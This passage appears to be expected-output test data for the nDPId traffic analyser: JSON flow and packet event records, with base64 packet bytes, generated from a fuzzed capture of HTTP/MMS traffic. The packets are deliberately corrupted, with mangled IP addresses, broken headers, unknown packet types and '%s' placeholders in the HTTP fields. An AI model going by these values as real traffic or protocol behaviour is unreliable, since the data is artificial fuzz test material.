qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="}
00657{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1031854488666,"flow_last_seen":1031854488667,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1460,"flow_avg_l4_payload_len":486,"midstream":0,"thread_ts_msec":1031854488667,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.3.5","src_port":80,"dst_port":2601,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":10,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854488668,"flow_last_seen":1031854488668,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854488668,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.3.5","src_port":81,"dst_port":2601,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1031854488668,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1031854488668,"pkt":"AFCLk5N8CAAgsl17CABFAAAoxKhAAEAGF+2sFAMNrBQDBQBRCinJpw1V5EuwPlAQgyxYbQAA"}
00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":11,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854488668,"flow_last_seen":1031854488668,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854488668,"l3_proto":"ip4","src_ip":"0.20.3.13","dst_ip":"172.20.3.5","src_port":80,"dst_port":2601,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1031854488668,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1031854488668,"pkt":"AFCLk5N8CAAgsl17CABFAAAoxKlAAEAGJXMAFAMNrBQDBQBQCinJpw1V5Eu18lAQgyxSuQAA"}
00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854488666,"flow_last_seen":1031854488666,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1031854488666,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.3.5","src_port":80,"dst_port":2601,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1031854488666,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1031854488666,"pkt":"AFCLk5N8CAAgsl17CABFAAAsxKdAAEAGF+qsFAMNrBQDBQBQCinJpw1U5EuqimASgyxGZAAAAgQFtA=="}
00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1031854488666,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1031854488666,"pkt":"CAAgsl17AFCLk5N8CABFAAAo9UpAAIAGp0qsFAMFrBQDDQopAFDkS6qKyacNVVAQIji\/FQAAAgQFtGDD"}
02416{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1031854488667,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":1031854488667,"pkt":"CAAgsl17AFCLk5N8CABFAAXc9kpAAIAGoJasFAMFrBQDDQopAFDkS6qKyacNVVAQIjheTQAAUE9TVCAvc2VydmxldHMvbW1zIEhUVFAvMS4xDQpIb3N8OiAxNzIuMjAuMy4xMw0KT3B0OiDQaHR0cDovL3d3dy53My5vcmdtMTk5OS8wNi8yNC1DQ1BQZXhjaGFuZ2UiOyBucz01Ng0KQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi92bmQud2FwLm1tcy1tZXNzYWdlDQpBY2NlcHQ6IGFwcGxpY2F0aW9uL3ZuZC53YXAubW1zLW1lc3NhZ2UNCkNhY2hlLUNvbnRyb2w6IG5vLWNhY2hlDQpBY2NlcHQtTGFuZ3VhZ2U6IGVuDQpVc2VyLUFnZW50OiBTb255RXJpY3Nzb25UNjgvUjIwMUENCkFjY2VwdC1DaGFyc2V0OiAqDQo1Ni1Qcm9maWxlLURpZmYtMTowPD94bWwgdmVyc2lvbj0iMS4wIj8+PHJkZjpSREYgeG1sbnM6cmRmPSJodHRwOi8vd3d3Lnd2Lm9yZy8xOTk5LzAyL6qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="}
00657{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1031854488666,"flow_last_seen":1031854488667,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1460,"flow_avg_l4_payload_len":486,"midstream":0,"thread_ts_msec":1031854488667,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.3.5","src_port":80,"dst_port":2601,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":10,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854488668,"flow_last_seen":1031854488668,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854488668,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.3.5","src_port":81,"dst_port":2601,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1031854488668,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1031854488668,"pkt":"AFCLk5N8CAAgsl17CABFAAAoxKhAAEAGF+2sFAMNrBQDBQBRCinJpw1V5EuwPlAQgyxYbQAA"}
00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":11,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854488668,"flow_last_seen":1031854488668,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854488668,"l3_proto":"ip4","src_ip":"0.20.3.13","dst_ip":"172.20.3.5","src_port":80,"dst_port":2601,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1031854488668,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1031854488668,"pkt":"AFCLk5N8CAAgsl17CABFAAAoxKlAAEAGJXMAFAMNrBQDBQBQCinJpw1V5Eu18lAQgyxSuQAA"}
00199{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":15,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","layer_type":21760,"global_ts_msec":1031854488923}
00611{"packet_event_id":1,"packet_event_name":"packet","packet_id":15,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":243,"pkt_type":21760,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":243,"pkt_l4_len":0,"thread_ts_msec":1031854488771,"pkt":"AFCLk5N8CAAgsl17VQBFAADlxKtAAEAGFy2sFAMNrBQDBQBQCinLpw1V5EvBTVAYgyzwBgAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXL+IFJlc2luLzIuMMsxDQpDb2509m50LVR5cGU6IGFwcGxpY2F0aW9uL3ZuZC53YXAubW1zLW1lc3NhZ2UNCkNvbnRlbnQtTGVuZ3RoOiA0NQ0KRGF0ZTogVGh1LCAxMiBTZXAgMjAwMiAxODoxNDo0OCBHTVQNCg0KjIGYMS05YmEwAI2QkoCLMTg5MzAwQGdl\/WTHMi5tb2JpbGl0eWxhYi5uZXQA"}
00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":16,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854489004,"flow_last_seen":1031854489004,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1031854489004,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.3.5","src_port":53132,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":16,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1031854489004,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1031854489004,"pkt":"AFCLk5N8CAAgsl17CABFAAAwxKxAAEAGF+GsFAMNrBQDBc+MAFDJtOyOAAAAAHACgywbmAAAAQEEiQIEBbQ="}
00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1031854489005,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1031854489005,"pkt":"CAAgsl17AFCLk5N8CABFAAAs+0pAAIAGoUasFAMFrBQDDQBQz4zkTZoOyWDsj2ASIjgTJgAAAgQFtG4v"}
00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1031854489005,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1031854489005,"pkt":"AFCLk5N8CAAgsl17CABFAAAoxK1AAEAGF+isFAMNrBQDBc+MAFDJtOyP\/k2aD1AQgyzJ7gAA"}
00752{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":19,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1031854489004,"flow_last_seen":1031854489006,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":316,"flow_tot_l4_payload_len":316,"flow_avg_l4_payload_len":79,"midstream":0,"thread_ts_msec":1031854489006,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.3.5","src_port":53132,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"%s","url":"%s","code":0,"content_type":"","user_agent":"MMS-Relay-DeliveryInitiator"}}
00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":22,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854489007,"flow_last_seen":1031854489007,"flow_idle_time":7440000,"flow_min_l4_payload_len":89,"flow_max_l4_payload_len":89,"flow_tot_l4_payload_len":89,"flow_avg_l4_payload_len":89,"midstream":1,"thread_ts_msec":1031854489007,"l3_proto":"ip4","src_ip":"172.20.3.1","dst_ip":"172.20.3.13","src_port":80,"dst_port":53132,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00587{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":22,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1031854489007,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":143,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":143,"pkt_l4_len":109,"thread_ts_msec":1031854489007,"pkt":"CAAgsl17AFCLk5N8CABFAACB\/UpAAIAGnvGsFAMBrBQDDQBQz4zkTZoPybTxE1AYHbQX8gAASFRUUC8xLjEgMTAwIENvbnRpbnVlDQpTZXJ2ZXI6IE1pY3Jvc29mdC1JSVMvNC4wDQpQYXRlOiBUaHUsIDEyIFNlcCAyMDAyIDE3OjU4OjU2IEdNVA0KDQo="}
00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":24,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854489031,"flow_last_seen":1031854489031,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1031854489031,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.57.3.13","src_port":80,"dst_port":53132,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00655{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1031854489031,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":195,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":195,"pkt_l4_len":161,"thread_ts_msec":1031854489031,"pkt":"CAAgsl17AFCLk5N8CABFAAC1\/kpAAIAGnb2sFAMFrDkDDQBQz4zkTZpoybTxE1AYHbQrwQAASFRUby8xLjEgMjAyIEFjY2VwdGVkDQpTZXJ2ZXI6IE1pY3Jvc29mdC1JSVMvNC4wDQpEYXRlOiBUaHUsIDEyIFNlcCAyMDUyIDE3OjU4OjU2IEdNVA0KQ29udGVudC1MZW5ndGg6IDQyNw0KJXMAdGVudC1UeXBlOiBhcHBsaWNhdGlvbi94bWwNCg0K"}
00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":26,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854489131,"flow_last_seen":1031854489131,"flow_idle_time":7440000,"flow_min_l4_payload_len":427,"flow_max_l4_payload_len":427,"flow_tot_l4_payload_len":427,"flow_avg_l4_payload_len":427,"midstream":1,"thread_ts_msec":1031854489131,"l3_proto":"ip4","src_ip":"172.6.3.5","dst_ip":"172.20.3.13","src_port":80,"dst_port":53132,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
01039{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":26,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1031854489131,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":481,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":481,"pkt_l4_len":447,"thread_ts_msec":1031854489131,"pkt":"CAAgsl17AFCLk5N8CABFAAHT\/0pAAIAGm5+sBgMFrBQDDQBQz4zkTZr1ybTxE1AYHbTqTgAAPD94bWwgdmVyc2lvbj0iMS4wIj8+CjwhRE9DVFlQRSBwYXAgUFVCTElDICItLy9XQVBGT1JVTS8vRFREIFBBUCAxLjAvL0VOIgogICAgICAgICAgImh0dHA6Ly93d3cud2FwZm9ydW0ub3JnL0RURC9wYXBfMS4wLmR0ZCI+CjxwYXA+CiAgPHB1c2gtcmVzcG9uc2UgcnVzaC1pZD0iMTg5MzAxXzEwMzE4NTQ0ODg5OTdfMTAzOEBnZWNkczIubW9iaWxpdHlsYWIubmV0IiBzZW5kZXKtYWRkcmVzcz0iaHR0cDovL2xtY21vbGYud2FwbWF0aWMuZGUiIHNlbmRlcuRuYW1lPSJ3Z3A0IiByZXBseS2qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqg=="}
00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":33,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854495447,"flow_last_seen":1031854495447,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1031854495447,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.21.3.13","src_port":2602,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":33,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1031854495447,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1031854495447,"pkt":"CAAgsl17AFCLk5N8CABFAAAsB0tAAIAGlUasFAMFrBUDDQoqAFDkZMdqAADsAGACIABjogAAAgQFtFQI"}
00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":16,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854489004,"flow_last_seen":1031854489004,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1031854489004,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.3.5","src_port":53132,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":16,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1031854489004,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1031854489004,"pkt":"AFCLk5N8CAAgsl17CABFAAAwxKxAAEAGF+GsFAMNrBQDBc+MAFDJtOyOAAAAAHACgywbmAAAAQEEiQIEBbQ="}
00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1031854489005,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1031854489005,"pkt":"CAAgsl17AFCLk5N8CABFAAAs+0pAAIAGoUasFAMFrBQDDQBQz4zkTZoOyWDsj2ASIjgTJgAAAgQFtG4v"}
00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1031854489005,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1031854489005,"pkt":"AFCLk5N8CAAgsl17CABFAAAoxK1AAEAGF+isFAMNrBQDBc+MAFDJtOyP\/k2aD1AQgyzJ7gAA"}
00752{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":19,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1031854489004,"flow_last_seen":1031854489006,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":316,"flow_tot_l4_payload_len":316,"flow_avg_l4_payload_len":79,"midstream":0,"thread_ts_msec":1031854489006,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.3.5","src_port":53132,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"%s","url":"%s","code":0,"content_type":"","user_agent":"MMS-Relay-DeliveryInitiator"}}
00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":22,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854489007,"flow_last_seen":1031854489007,"flow_idle_time":7560000,"flow_min_l4_payload_len":89,"flow_max_l4_payload_len":89,"flow_tot_l4_payload_len":89,"flow_avg_l4_payload_len":89,"midstream":1,"thread_ts_msec":1031854489007,"l3_proto":"ip4","src_ip":"172.20.3.1","dst_ip":"172.20.3.13","src_port":80,"dst_port":53132,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
